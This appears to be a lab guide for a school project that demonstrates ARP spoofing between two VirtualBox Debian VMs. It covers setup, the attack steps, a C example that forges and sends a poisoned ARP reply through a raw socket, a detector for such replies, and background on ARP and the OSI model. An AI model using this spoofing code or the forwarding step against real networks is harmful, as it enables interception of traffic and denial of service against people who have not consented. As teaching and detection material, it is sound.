FT_MALCOLM is a project that demonstrates a Man-in-the-Middle (MITM) attack using ARP spoofing in a controlled virtual environment. This guide walks you through setting up two Debian virtual machines (one attacker, one victim), configuring their networks, and running the FT_MALCOLM tool to observe ARP poisoning in action. The document also explains the underlying network concepts and protocols involved.
- Overview
- Virtual Machine Setup
- VM Network Configuration
- Man-in-the-Middle Attack
- How It Works
- OSI Model
- Sources
This project requires two virtual machines: one as the victim and one as Malcolm (the attacker).
- Debian 12.11.0 Image: Download
- Virtualization: Oracle VM VirtualBox is recommended.
Tip: Install Guest Additions for clipboard sharing and drag-and-drop functionality.
After creating both VMs, enable clipboard sharing:
- In VirtualBox, go to Devices > Shared Clipboard > Bidirectional for each VM.
The Debian installer only sets up sudo for your user if you left the root password empty. If that is not the case, switch to root instead of editing the sudoers file:
su -
and run the commands below without the sudo prefix. Update the system and install the required packages:
sudo apt-get update && sudo apt-get upgrade
sudo apt-get install -y vim git net-tools iproute2 arping iputils-ping tcpdump
git clone https://github.com/ftTower/ft_malcom.git ft_malcolm
cd ft_malcolm
echo done
Configure both VMs to use DHCP for the NAT network:
sudo bash -c 'cat <<EOF > /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto enp0s3
iface enp0s3 inet dhcp
EOF'
echo "Network configuration replaced. Implementing DHCP for NAT network."
sudo systemctl restart networking
clear && ip a
- In VirtualBox, go to File > Tools > Network Manager > NAT Networks and create a new NAT network.
- For both VMs, go to Machine > Settings > Network, set "Attached to" to NAT Network, and select the network you created.
Both VMs must be attached to the same NAT Network: ARP never crosses a router, so the attacker has to share the victim's Layer 2 broadcast domain. Plain "NAT" mode gives each VM its own isolated network, and the attack cannot work there.
After configuring the VMs, collect the four values the tool needs. (Optional: in a real scenario you would discover hosts with nmap; here you can read the addresses off each VM directly.)
On the Malcolm VM:
ip route
- Output: default via <gateway_ip> dev enp0s3 ...
ip addr show enp0s3
- Output: link/ether <Malcolm_MAC_Address>
On the Victim VM:
ip addr show enp0s3
- Output: inet <Victim_IP>
- Output: link/ether <Victim_MAC_Address>
On the Malcolm VM, start the attack tool as root (it opens a raw socket, which needs CAP_NET_RAW):
./ft_malcolm <gateway_ip> <malcolm_mac_address> <victim_ip> <victim_mac_address>
- <gateway_ip>: the "default via" address printed by ip route on the Malcolm VM.
- <malcolm_mac_address>: the link/ether field printed by ip addr show enp0s3 on the Malcolm VM.
- <victim_ip> and <victim_mac_address>: the inet and link/ether fields printed by ip addr show enp0s3 on the Victim VM.
Once FT_MALCOLM is running and listening, run the following on the Victim VM (as root) to flush the ARP cache and force a fresh ARP request for the gateway:
ip -s -s neigh flush all && ping -c 1 <gateway_ip>
Malcolm sees the victim's broadcast ARP request for <gateway_ip> and answers it with a forged ARP reply stating that <gateway_ip> is at <malcolm_mac_address>. The forged reply races the real gateway's reply, so if the poisoning does not take on the first try, flush and ping again.
To verify that the victim is ARP poisoned, display the ARP table on the Victim VM:
ip neigh show
You should see <gateway_ip> associated with Malcolm's MAC address instead of the gateway's real one, indicating a successful ARP spoofing attack. From this point every frame the victim sends to the gateway is delivered to Malcolm. Unless Malcolm forwards that traffic (sysctl -w net.ipv4.ip_forward=1, with the gateway poisoned symmetrically so return traffic also passes through Malcolm), the victim simply loses connectivity: that is a denial of service, not yet a transparent man-in-the-middle.
You can watch the ARP exchange (the victim's broadcast request, then the replies) with tcpdump on either VM:
tcpdump -vv -i <interface> arp
The interface is enp0s3 in this VM setup; on the 42 computers it is also enp0s3.
- Preamble and Start Frame Delimiter (SFD): Used for clock synchronization between devices.
- Destination MAC Address: The physical address of the recipient's network card.
- Source MAC Address: The physical address of the sender's network card.
- Type/Length (EtherType): Indicates the type of upper-layer protocol encapsulated in the frame (e.g., 0x0800 for IPv4, 0x0806 for ARP).
- Data (Payload): The actual content, which can be an IP packet, an ARP message, etc. The minimum data size in an Ethernet frame is 46 bytes (padding bytes are added if the content is smaller).
- Frame Check Sequence (FCS): An error-detection code to ensure the frame was not corrupted during transmission.
The ARP table (Address Resolution Protocol) is a cache kept in memory by every device on the network. Its role is to map IP addresses (Layer 3 logical addresses) to MAC addresses (Layer 2 physical addresses).
How the ARP table works:
- ARP Request: If a device needs the MAC address for an IP address it does not know, it sends an ARP request as a broadcast on the local network.
- ARP Reply: The device that owns the requested IP address responds with its MAC address. This reply is sent as a unicast frame.
- ARP Table Update: The device that initiated the request adds the IP-MAC entry to its ARP table for future communications.
ARP has no authentication: the requester cannot tell whether a reply really comes from the owner of the IP address, so it records whatever MAC the reply carries. That is exactly what FT_MALCOLM exploits. It answers the victim's request for the gateway's IP with Malcolm's MAC, and from then on the victim's cache sends gateway-bound frames to Malcolm.
/* struct ethhdr, from <linux/if_ether.h>: the 14-byte Ethernet header (ETH_ALEN is 6) */
struct ethhdr {
    unsigned char h_dest[ETH_ALEN];   /* Destination Host Address */
    unsigned char h_source[ETH_ALEN]; /* Source Host Address */
    unsigned short h_proto;           /* Protocol type (EtherType, 0x0806 for ARP) */
};
/* struct ether_arp, from <netinet/if_ether.h>: the 28-byte ARP message for Ethernet/IPv4 */
struct ether_arp {
    struct arphdr ea_hdr;             /* ARP hrd & proto et al */
    u_char arp_sha[ETH_ALEN];         /* Sender hardware address */
    u_char arp_spa[4];                /* Sender protocol address */
    u_char arp_tha[ETH_ALEN];         /* Target hardware address */
    u_char arp_tpa[4];                /* Target protocol address */
};
/* struct arphdr, from <net/if_arp.h>: the fixed 8-byte ARP header; ar_op is 1 for a request, 2 for a reply */
struct arphdr {
    unsigned short ar_hrd;            /* Format of hardware address (1 = Ethernet) */
    unsigned short ar_pro;            /* Format of protocol address (0x0800 = IPv4) */
    unsigned char ar_hln;             /* Length of hardware address (6) */
    unsigned char ar_pln;             /* Length of protocol address (4) */
    unsigned short ar_op;             /* ARP opcode (command) */
};
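The three structures above are all that is needed to forge the reply FT_MALCOLM sends in the attack section, and to check on the victim side whether such a reply is on the wire. The following is an added example written for this page, not ft_malcolm's own code: build_arp_reply packs an ARP reply claiming that the gateway's IP is at Malcolm's MAC, is_poisoned_arp flags any ARP frame whose sender fields bind the gateway's IP to a MAC other than the one you recorded by hand, and send_frame (Linux only) puts a frame on enp0s3 through an AF_PACKET raw socket. The addresses in the sample (10.0.2.1 as the NAT-network gateway, 10.0.2.15 as the victim, the 08:00:27 and 52:54:00 MACs) are constructed for the example, and the function names are the example's own.

```c
/* Added example, not ft_malcolm's code: forge the ARP reply that does the
 * poisoning, and detect such a reply on the victim side. Linux/glibc headers. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <arpa/inet.h>         /* inet_pton, htons, ntohs */
#include <netinet/if_ether.h>  /* struct ethhdr, struct ether_arp, ETH_P_*, ARPOP_*, ARPHRD_ETHER */

#define ARP_FRAME_LEN (sizeof(struct ethhdr) + sizeof(struct ether_arp))  /* 14 + 28 = 42 */

/* Constructed sample addresses: VirtualBox NAT networks default to 10.0.2.0/24
 * with the gateway at 10.0.2.1; the MACs are invented for this example. */
static const char   *kGatewayIp = "10.0.2.1";
static const char   *kVictimIp  = "10.0.2.15";
static const uint8_t kMalcolmMac[ETH_ALEN] = {0x08, 0x00, 0x27, 0x11, 0x22, 0x33};
static const uint8_t kVictimMac[ETH_ALEN]  = {0x08, 0x00, 0x27, 0x44, 0x55, 0x66};
static const uint8_t kGatewayMac[ETH_ALEN] = {0x52, 0x54, 0x00, 0x12, 0x35, 0x00};

/* Write the Ethernet+ARP reply "spoofed_ip is at spoofed_mac", unicast to the
 * victim, into frame (>= ARP_FRAME_LEN bytes). Returns the length, or 0 if an
 * IP string does not parse. Structs are filled on the stack and copied in, so
 * nothing is accessed unaligned through the byte buffer. */
size_t build_arp_reply(uint8_t *frame, const uint8_t *spoofed_mac, const char *spoofed_ip,
                       const uint8_t *victim_mac, const char *victim_ip)
{
    struct ethhdr eth;
    struct ether_arp arp;
    struct in_addr sip, tip;

    if (inet_pton(AF_INET, spoofed_ip, &sip) != 1 || inet_pton(AF_INET, victim_ip, &tip) != 1)
        return 0;
    memcpy(eth.h_dest, victim_mac, ETH_ALEN);
    memcpy(eth.h_source, spoofed_mac, ETH_ALEN);
    eth.h_proto = htons(ETH_P_ARP);             /* 0x0806 */
    arp.ea_hdr.ar_hrd = htons(ARPHRD_ETHER);    /* 1: Ethernet, 6-byte addresses */
    arp.ea_hdr.ar_pro = htons(ETH_P_IP);        /* 0x0800: IPv4, 4-byte addresses */
    arp.ea_hdr.ar_hln = ETH_ALEN;
    arp.ea_hdr.ar_pln = 4;
    arp.ea_hdr.ar_op  = htons(ARPOP_REPLY);     /* 2 */
    memcpy(arp.arp_sha, spoofed_mac, ETH_ALEN); /* sender MAC: Malcolm's ...      */
    memcpy(arp.arp_spa, &sip, 4);               /* ... claiming the gateway's IP  */
    memcpy(arp.arp_tha, victim_mac, ETH_ALEN);
    memcpy(arp.arp_tpa, &tip, 4);
    memcpy(frame, &eth, sizeof eth);
    memcpy(frame + sizeof eth, &arp, sizeof arp);
    return ARP_FRAME_LEN;
}

/* Victim-side check: 1 if the frame is an ARP request or reply whose sender
 * fields bind gateway_ip to a MAC other than gateway_mac (the MAC recorded
 * before the attack), else 0. Requests count too: a receiver may learn from
 * the sender fields of a request just as from a reply. */
int is_poisoned_arp(const uint8_t *frame, size_t len, const char *gateway_ip,
                    const uint8_t *gateway_mac)
{
    struct ethhdr eth;
    struct ether_arp arp;
    struct in_addr gw;
    uint16_t op;

    if (len < ARP_FRAME_LEN || inet_pton(AF_INET, gateway_ip, &gw) != 1)
        return 0;
    memcpy(&eth, frame, sizeof eth);
    memcpy(&arp, frame + sizeof eth, sizeof arp);
    op = ntohs(arp.ea_hdr.ar_op);
    if (ntohs(eth.h_proto) != ETH_P_ARP || (op != ARPOP_REQUEST && op != ARPOP_REPLY))
        return 0;
    if (memcmp(arp.arp_spa, &gw, 4) != 0)
        return 0;                               /* not about the gateway's IP */
    return memcmp(arp.arp_sha, gateway_mac, ETH_ALEN) != 0;
}

#ifdef __linux__
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <unistd.h>
/* Put a frame on the wire via an AF_PACKET raw socket on ifname (enp0s3 in the
 * VM setup). Needs CAP_NET_RAW, i.e. root. Returns bytes sent or -1. */
ssize_t send_frame(const char *ifname, const uint8_t *frame, size_t len)
{
    struct sockaddr_ll sll;
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
    ssize_t n;

    if (fd < 0)
        return -1;
    memset(&sll, 0, sizeof sll);
    sll.sll_family   = AF_PACKET;
    sll.sll_protocol = htons(ETH_P_ARP);
    sll.sll_ifindex  = (int)if_nametoindex(ifname);
    sll.sll_halen    = ETH_ALEN;
    memcpy(sll.sll_addr, frame, ETH_ALEN);      /* destination MAC is the frame's first field */
    n = sendto(fd, frame, len, 0, (struct sockaddr *)&sll, sizeof sll);
    close(fd);
    return n;
}
#endif
```

To reproduce the tool's behaviour, wait for the victim's broadcast request for <gateway_ip> (for example through the same AF_PACKET socket, bound with ETH_P_ARP), then call build_arp_reply with the four values from the command line and send_frame("enp0s3", ...) as root. is_poisoned_arp is the programmatic form of the ip neigh show check: feed it every ARP frame captured on the victim and alert on the first one that returns 1.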
Layer 1: Physical Layer
Responsible for transmitting raw bits over the physical medium (cables, Wi-Fi, fiber optics).
Examples: RJ45 connectors, volts, Hz, bits, radio waves, Ethernet cables.
Layer 2: Data Link Layer
Ensures error-free data transmission over a direct link and manages physical addressing.
Examples: MAC addresses, Ethernet frames, switches, PPP, ARP.
Layer 3: Network Layer
Manages logical addressing and routing of packets across different networks.
Examples: IP addresses, routers, IP protocol.
Layer 4: Transport Layer
Provides reliable end-to-end communication between applications, segments data, and ensures correct order.
Examples: TCP, UDP, port numbers.
Layer 5: Session Layer
Establishes, manages, and terminates communication sessions between applications.
Examples: RPC, NetBIOS.
Layer 6: Presentation Layer
Ensures data format compatibility, translates, compresses, and encrypts data.
Examples: JPEG, ASCII, SSL/TLS.
Layer 7: Application Layer
Provides network services directly to software applications, closest to the user.
Examples: HTTP, FTP, SMTP, DNS.